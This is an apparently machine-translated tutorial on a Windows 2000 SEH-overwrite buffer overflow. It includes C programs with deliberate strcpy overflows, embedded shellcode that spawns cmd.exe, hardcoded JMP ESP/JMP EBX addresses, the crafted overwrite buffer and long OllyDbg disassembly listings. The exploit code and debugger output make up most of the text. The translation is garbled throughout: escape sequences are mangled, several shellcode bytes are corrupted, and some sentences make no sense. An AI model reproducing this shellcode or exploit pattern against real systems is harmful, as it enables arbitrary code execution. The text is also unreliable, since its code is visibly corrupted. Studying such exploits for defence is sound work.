There is an example in the "Q version buffer overflow tutorial" as follows:
#include
/ * The following shellcode will turn on a cmd. * / "/ X55 / x8b / x50 / x50 / xc6 / x45 / xf4 / x4d / xc6 / x45 / x4 / x53" "/ XC6 / X45 / XF6 / X56 / XC6 / X45 / XF7 / X43 / XC6 / X45 / XF8 / X52 / XC6 / X45 / XF9 / X54 / XC6 / X45 / XFA / X2E / XC6 "" / x45 / xfb / x44 / xc6 / x45 / XFC / X4C / XC6 / X45 / XFD / X4C / XBA "" / x60 / x1e / x80 / x7c "// 2003 SP1 on loadLibrarya address: 0x7c801e60" / x52 / x8d / x45 / xf4 / x50 "" / XFF / X55 / XF0 "" / x55 / x8b / XEC / x83 / XEC / X2C / XB8 / X63 / X6F / X6D / X6D / X89 / X45 / XF4 / XB8 / X61 / X6E / X64 / X2E "" / x89 / x45 / XF8 / XB8 / X63 / X6F / X6D / X22 / X89 / X45 / XFC / X33 / XD2 / X88 / X55 / XFF / X8D / X45 / XF4 "" / X50 / xb8 "" / x83 / xa0 / xb8 / x77 " // 2003 SP1 SYSTEM address: 0x77B8A083 "/ XFF / XD0";
Int main () {
CHAR OUTPUT [8]; INT I;
STRCPY (OUTPUT, NAME);
For (i = 0; i <8 && output [i]; i ) {
Printf ("// 0x% x", output [i]);} printf ("/ n"); return 0;} This uses JMP ESP to override the return point, that is, the place to save the EIP address The JMP ESP is covered, which is equivalent to execution: POP EIP, JMP EIP. That is, the JMP ESP's address will be assigned to the EIP, and then the EIP will perform JMP ESP, and due to the Pop EIP, the top pointer is moved down (ie, the velvere direction), just point to our shellcode address, So JMP ESP will execute our shellcode. Later, I read the method of using anomalous handling to perform shellcode. I really want to find a chance to practice, so I re-analyze the above program, change the original JMP ESP's overflow method to JMP EBX mode, the analysis process is as follows:
First, the value of Char Name [] is a point (more than me in my heart), so that it covers an exception handling entry, compiles the program with the debug mode, and use OllyDBG V1.10 to disassemble, the code is as follows:
. 00401270 s> / $ 55 push ebp00401271 | 8BEC mov ebp, esp00401273 | 6A FF push -100401275 | 68 38014200 push strcpyFl.004201380040127A | 68 743F4000 push strcpyFl.00403F74; SE handler is installed 0040127F | 64:... A1 0000000>. MOV EAX, DWORD PTR FS: [0]; at this time, the top value is an exception handler address, that is, ESP = 0012FFB400401285 |. 50 push eax00401286 |. 64: 8925 00000> MOV DWORD PTR FS: [0], ESP0040128D | 83000401290 |. 53 push ebx00401291 |. 56 Push ESI00401292 |. 57 Push EDI00401293 |. 8965 E8 MOV DWORD PTR SS: [EBP-18], why is ESP What is the opening of the stack is an abnormally handled entry? Here, some principles of abnormal processing can be seen, you can see "using SEH execution shellcode", article address: http://elfhack.whitecell.org/chinesDocs/seh1.txt, some difficulty, like me, etc. The rookie is not understood, I will write my own understanding, you can refer to it. He mentioned in his article, fs: [0] points to a _exception_registration structure (I understand the exception handling entry), this _exception_registration structure is as follows:
Struct _exception_registration {front _exception_registration structure; exception handler entry;}
Each _exception_registration structure includes two pointers, the front pointer refers to a _exception_registration to form a chain (if you don't know what is called chain, you can see the data structure of the C language). The latter pointer points to the address of the exception handler. Here, it is necessary to remind the address of the exception handle and an exception handler, as follows:
Struct_exception_registration <- Address 1, here is an exception handler address -4, ie 0012ffb0 {front_exception_registration structure; <- address 2, the value and address 1 here is the same exception handler entry; <- - Address 3, here is the 0012ffb4} analysis of the above analysis
The exception handling entrance refers to address 1, in fact, the value of address 1 and address 2 is the same, because the address of the structure is actually the location of the first member in the structure. Outnomial handler address (address 3) = the previous _exception_registration structure (address 2) 4, why add 4? Because address 2 is a pointer, 4 bytes.
The first-mentioned fs: [0] points to a _exception_registration structure, that is, FS: [0] points to address 1 (that is, address 2), when an exception occurs, the function of address 3 will perform, we have to do Two things, one is to change the value of the address 1 into JMP 04, and the other is to change the value in the address 3 into JMP EBX. The value corresponding to JMP 04 is: "04eb9090, that is, the value to be changed to: 04eb9090. The general address of JMP EBX is: 0x7ffa1571, so that the value of the address 3 is changed to 7FFA1571. Next we have to do It is to find the address of the returned point (in fact, the JMP ESP example has been found).
Continue to track, found that the CALL at 00401354 is our code, press F7 to follow.
00401354 |. E8 acfcfffffffffffffffff
After this is executed, you will jump to below:
00401005 / $ / E9 06000000 jmp strcpyFl.004010100040100A | | CC int30040100B | | CC int30040100C | | CC int30040100D | | CC int30040100E | | CC int30040100F | | CC int300401010 |> / 55 push ebp00401011 |. 8BEC mov ebp, esp00401013 |. 83EC 4C sub esp, 4C00401016 | 53 push ebx00401017 | 56 push esi00401018 | 57 push edi00401019 | 8D7D B4 lea edi, dword ptr ss:.... [ebp-4C] 0040101C | B9 13000000 mov ecx, 1300401021 | B8 CCCCCCCC mov.. eax, CCCCCCCC00401026 | F3:. AB rep stos dword ptr es:.. [edi] 00401028 | 68 98334200 push strcpyFl.004233980040102D | 8D45 F8 lea eax, dword ptr ss:. [ebp-8] 00401030 | 50 push eax00401031 |. E8 0A010000 Call struffpyfl.0040114000401036 |. 83C4 08 Add ESP, 800401039 |. C745 F4 00000> MOV DWORD PTR SS: [EBP-C], 000401040 |. EB 09 JMP SHORT STRCPYFL.0040104B00401042 |> 8B4D F4 / MOV ECX, DWORD PTR SS: [EBP-C] 00401045 |. 83C1 01 | Add ECX, 100401048 |. 894D F4 | MOV DWORD PTR SS: [EBP-C], ECX0040104B |> 837D F4 08 CMP DWORD PTR SS: [EBP-C], 80040104F |. 7d 24 | JGE Short Strcpyfl.0040107500401051 |. 8b55 F4 | MOV EDX, DWORD PTR SS: [EBP-C] 00401054 |. 0fbe4415 f8 | Movsx Eax, BYTE PTR SS: [EBP EDX-8] 00401059 |. 85c0 | Test Eax, EAX0040105B |. 74 18 | JE Short Strcpyfl.004010750040105d |. 8b4d F4 | MOV ECX, DWORD PTR SS: [EBP-C] 00401060 |. 0FBE540D F8 | Movsx EDX, BYTE PTR SS: [EBP ECX-8] 00401065 |. 52 | Push EDX;
. / Arg200401066 | 68 20004200 | push strcpyFl.00420020; | Arg1 = 00420020 ASCII "/ 0x% x" 0040106B | E8 50000000 | call strcpyFl.004010C0;. /StrcpyFl.004010C000401070 | 83C4 08 | add esp, 800401073 | ^.. EB CD / jmp short strcpyFl.0040104200401075 |> 68 1C004200 push strcpyFl.0042001C; / Arg1 = 0042001C0040107A | E8 41000000 call strcpyFl.004010C0;. /strcpyFl.004010C00040107F | 83C4 04 add esp, 400401082 | 33C0 xor eax, eax00401084 |.. . 5F pop edi00401085 |. 5E pop esi00401086 |. 5B pop ebx00401087 |. 83C4 4C add esp, 4C0040108A |. 3BEC cmp ebp, esp0040108C |. E8 9F010000 call strcpyFl.0040123000401091 |. 8BE5 mov esp, ebp00401093 |. 5D pop ebp00401094 / This is a return point. At this time, the ESP = 0012FF84 is analyzed from above. The return point address is 0012FF84, the abnormality processing entry point is: 0012ffb0, combined with the JMP ESP example, we can get the result to be overwritten:
"/ x41 / x41 / x41 / x41" // name [0] - Name [3] "/ x41 / x41 / x41 / x41" // name [4] - Name [7] "/ x41 / x41 / x41 / X41 "// EBP" / x12 / x45 / xfa / x7f "// universal JMP ESP address: 7FFA4512
"/ x41 / x41 / x41 / x41" // From here the 40 byte length, "/ x41 / x41 / x41 / x41" // | ... // 40 can be achieved Bytes "/ x41 / x41 / x41 / x41" // | "// |" / x90 / x90 / Xeb / x04 "// This is an abnormally handled entry, overwritten: JMP 04 "/ x71 / x15 / xfa / x7f" // This is an exception handler address, which covers a general address of JMP EBX: 7FFA1571
From the above shellcode, it is also possible to see that the character length in front of the inlet is 8 4 4 40 = 56 bytes. We can use casual buildings in front of this. The last successful spilled code is as follows:
/ * * STRCPYFLOW.C * by: ∮ Tomorrow goes * http://blog.9cbs.net/kgdiwss * /
#include
Char name [] = "abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcd" // 56 bytes (length of the first 8 bytes Output [8], the length of 48 bytes overflow) "/ x90 / x90 / xeb / x04" // jmp 04 "/ x71 / x15 / xfa / x7f" // jmp EBX general address // The following shellcode will turn on a cmd. "/ x55 / x8b / xec / x33 / xc0 / x50 / x50 / x50 / xc6 / x45 / xf4 / x4d / XC6 / X45 / XF5 / X53 "" / XC6 / X45 / XF6 / X56 / XC6 / X45 / XF7 / X43 / XC6 / X45 / XF8 / X52 / XC6 / X45 / XF9 / X54 / XC6 / X45 / XFA / X2E / Xc6 "" / x45 / xfb / x44 / xc6 / x45 / xfc / x4c / xc6 / x45 / xfd / x4c / xba "/ x23 / x80 / xe7 / x77" // 2000 SP0 on the LoadLibrarya address: 0x77E78023 "/ X52 / X8D / X45 / XF4 / X50 "" / XFF / X55 / XF0 "" / X55 / X8B / XEC / XB83 / XEC / X2C / XB8 / X63 / X6F / X6D / X6D / X89 / X45 / XF4 / XB8 / X61 / x6e / x64 / x2e "" / x89 / x45 / x4 / x6d / x22 / x89 / x45 / x55 / xff / x8d / x45 / xf4 "" / X50 / xb8 "/ xad / xaa / x01 / x78" // 2000 SP0 SYSTEM address: 0x7801AAAD "/ XFF / XD0"; int main () {char output [8]; int 1;
STRCPY (OUTPUT, NAME); for (i = 0; I <8 && Output [i]; i ) {printf ("// 0x% x", Output [i]);} printf ("/ n");
RETURN 0;} When this program runs to the return point, the data in the stack is as follows:
Running effect screenshot (pop up a cmd): This example is overflow on Windows2000 SP0. Although this is just a small experiment, I spent me for many days, I encountered the following problems during the test: 1. I can't find an exception handler address. 2. I used shellcode on WindWos2003 in Windows2000 SP0, but I forgot to make changes, and then discovered that I have already executed my shellcode, just because the function addresses such as system is not correct. So say that the rookie is very hard every step, when I am overflow in the morning, it is really very happy. At the same time, once again, it is verified: people have to rely on this sentence. During the test, I have also asked a lot of friends, no matter where they can help, I am very grateful to them. Alternatively I start school overflow programming, so if there is a mistake in the article, please let me know that I am grateful.